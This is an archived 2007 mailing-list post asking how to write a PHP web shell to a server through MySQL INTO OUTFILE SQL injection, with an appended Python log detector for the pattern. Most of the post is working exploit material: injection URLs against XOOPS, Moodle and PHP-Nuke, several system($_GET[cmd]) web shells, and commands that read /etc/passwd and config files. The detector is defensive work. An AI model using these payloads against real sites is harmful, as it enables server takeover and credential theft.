Writing a phpshell via SQL Injection to a host

From: Joseph McCray (joe@learnsecurityonline.com)
Date: Wed Dec 12 2007 - 12:40:11 EST


Ok guys...

I've really been hitting SQL Injection pretty hard lately. I feel pretty
comfy with SQL Injection on MSSQL server now, and I'm starting to play
with it on MySQL.

Feeling pretty confident on inference based stuff so now I'm working on
writing a phpshell to a host. I'm really hoping that someone here can
point me in the right direction to figure this out, and/or provide me
with some clarification on the specifics of the attack.

The best reference on this type of attack that I've found so far is:
http://www.webapptest.org/index.php?entry=entry070910-130659

He does it like this:
{beginning of injection} AND 1=0 UNION SELECT 1,1,1,'my code here' INTO
OUTFILE '/www/htdocs/shell.php/'/*

I've found a few other exploits that actually use this technique, but
they don't implement it in the same way. So I'm still not following the
logic, the methodology - that whatever...dude I don't f*cking know how
to make this work - it just hasn't clicked for me for some reason.

I'm missing something here....

So the primary conditions where this attack is possible are:

1. mysql user must have the FILE privilege;

2. the operator requires a "quoted" file pathname, so the web
application should not escape/filter them;

3. httpd and mysql should be installed on the same machine, or (if you
can) the file will be written on the dbms machine;

4. You need to know the full path name of the web root.

===================

1. Ok, FILE privilege - Will you see some sort of permission denied
error during the attempt? How will I be able to determine this remotely?

2. This one is probably just trial and error (cross your fingers and
hope I guess) to figure this out.

3. This is pretty common.

4. This can be enumerated by reading the errors from your injection.

Ok let's get to the meat of the attack.

-QUOTE-
AND 1=0" because in this way I was able to make the first query return
0 rows (so no data from the original query will be inserted in
shell.php). Second : we can notice that in shell.php there are some
undesired data (1 1 1). To avoid their presence we can use "null" or ''.
-/QUOTE-

Exploits I found that write a phpshell are not using the 1=0. I don't
understand why. I've posted a few that I've found below. Can someone
clarify?

Next, I'm really not understanding those zeros before and after the
actual phpshell page (e.g. ,0 ,0 ,0 ,0).

How do I know how many of these zeros I need, if at all? Someone told me
that it had something to do with the number of columns in the table. Can
someone clarify?

-----------SQL Injection with INTO OUTFILE Notes:------------

######################
# N-13 Exploit Usage #
######################
"0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0
INTO \
OUTFILE '$outfile"

go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results

############
# Option 1 #
############
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php
system($_GET["-cmd"]); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print shell_exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

############
# Option 2 #
############
1. create a php-file with the following code: <?php
system($_GET['cmd']); ?>

2. save it as shell.php

3. now you can execute commands by connecting to this file:

http://yourserver.com/shell.php?cmd=[command you want to execute]

########################
# XOOPS Exploit Method #
########################
http://[target]/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-1'%20or'a'='a'%20UNION%20SELECT%200,0,0,'<?php%20system($_GET[cmd]);?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/xoops/uploads/shell.php'%20FROM%20fXZtr_wfdownloads_downloads/*

after you can launch commands:
http://[target]/[path_to_xoops]/uploads/shell.php?cmd=cat%20/etc/passwd

###########################
# PHP-Nuke Exploit Method #
###########################
'UNION SELECT '<?error_reporting(0);?>',0,0,0,0,0,0,0,'<?echo \"Hi Master\";ini_set(\"max_execution_time\",0);system(\$_GET[cmd]);die;?>',0 INTO OUTFILE '".$pathtoWWW.$path."shell.php' FROM nuke_users/*

#########################
# Moodle Exploit Method #
#########################
[1] http://[target]/[path]/course/category.php?id='%20UNION%20SELECT%200,'<?php%20system($_GET[cmd]);%20?>',0,0,0,0,0,0%20INTO%20DUMPFILE%20'../../www/moodle/shell.php'%20FROM%20mdl_course_categories/*

[2] http://[target]/[path]/course/info.php?id='UNION%20SELECT%200,0,0,0,'<?php%20system($_GET[cmd]);%20?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../../www/moodle/shell.php'%20FROM%20mdl_course/*

now in shell.php we have something like:

00000<?php system($_GET[cmd]); ?>000000

so you can launch commands, ex.:

http://[target]/[path]/shell.php?cmd=cat%20config.php

##############################
# Nice Name Crew PHP Shell 1 #
##############################
INSERT INTO `test` VALUES (' INSERT INTO shell (codetab) values (''<? $cmd=$_REQUEST["-cmd"];\r\n ?><html><head><title>Darkside's php shell</title></head><body bgcolor=#000000 text=#ffffff\r\n onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT \r\n name="-cmd" size=64 value="<?=$cmd?>" style=background:#000000;color:#ffffff;"><pre><?\r\n if($cmd !="") print Shell_Exec($cmd);?></pre></form></body></html>'');\r\n SELECT * INTO OUTFILE ''/srv/www/htdocs/tbl_cmd.php''from test;\r\n FLUSH LOGS; \r\n');

-------------------end of my notes---------------------------------

I'd really like some help in figuring this one out. There are some
basics that just aren't clicking for me. Any help would be greatly
appreciated.

-- 
Joe McCray
Toll Free:  1-866-892-2132
Email:      joe@learnsecurityonline.com
Web:        https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games        * Simulators
* Challenge Servers     * Courses
* Hacking Competitions  * Hacklab Access
"The only thing worse than training good employees and losing them 
is NOT training your employees and keeping them." 
        - Zig Ziglar
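A detection-side companion to the notes above, added here and not part of Joe's post: a Python filter that URL-decodes and normalises access-log requests, flags the UNION SELECT ... INTO OUTFILE/DUMPFILE shape the exploit notes use, and counts the select-list items (the ",0" padding the post asks about has to match the original query's column count). The log lines and the x.php placeholder are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (not from the original post). Lines 2 and 4 carry the
# URL-encoded "UNION SELECT ... INTO OUTFILE/DUMPFILE" shape from the notes above,
# with a harmless placeholder where a PHP body would be.
SAMPLE_LOG = """
10.0.0.5 - - [12/Dec/2007:12:40:11 -0500] "GET /modules/wfdownloads/viewcat.php?list=3 HTTP/1.1" 200 512
10.0.0.9 - - [12/Dec/2007:12:41:02 -0500] "GET /modules/wfdownloads/viewcat.php?list=-1'%20UNION%20SELECT%200,'<?php%20x%20?>',0%20INTO%20OUTFILE%20'../../www/uploads/x.php'/* HTTP/1.1" 200 0
10.0.0.7 - - [12/Dec/2007:12:42:30 -0500] "GET /course/category.php?id=7 HTTP/1.1" 200 2048
10.0.0.9 - - [12/Dec/2007:12:43:15 -0500] "GET /course/info.php?id='UNION/**/SELECT/**/0,0/**/INTO/**/DUMPFILE/**/'x.php'/* HTTP/1.1" 500 0
""".strip().splitlines()

# Common log format prefix (client IP, request target), then the file-write pattern
# matched against the normalised query string.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
OUTFILE_RE = re.compile(
    r"union\s+(?:all\s+)?select\s+(?P<cols>.*?)\s+into\s+(?P<kind>outfile|dumpfile)\s+'(?P<file>[^']*)'",
    re.IGNORECASE)

def normalize(query_string):
    """URL-decode twice (catches double encoding), turn /**/ comments into
    spaces and collapse whitespace so one regex covers the encodings above."""
    s = unquote(unquote(query_string))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)

def count_select_columns(select_list):
    """Top-level items in the injected select list, ignoring commas inside quotes.
    This must equal the original query's column count: the ',0,0,0' padding's job."""
    cols, in_quote = 1, False
    for ch in select_list:
        if ch == "'":
            in_quote = not in_quote
        elif ch == "," and not in_quote:
            cols += 1
    return cols

def analyze(line):
    """Finding dict for a request that writes a file via UNION SELECT ... INTO OUTFILE/DUMPFILE, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group(2).partition("?")
    hit = OUTFILE_RE.search(normalize(query))
    if not hit:
        return None
    return {"ip": m.group(1), "path": path, "kind": hit.group("kind").lower(),
            "file": hit.group("file"), "columns": count_select_columns(hit.group("cols"))}
```

Run `[analyze(l) for l in SAMPLE_LOG]` to see which of the constructed lines are flagged; in production, feed the same function the query log or WAF log instead, since the write happens on the database side.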




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:16 EDT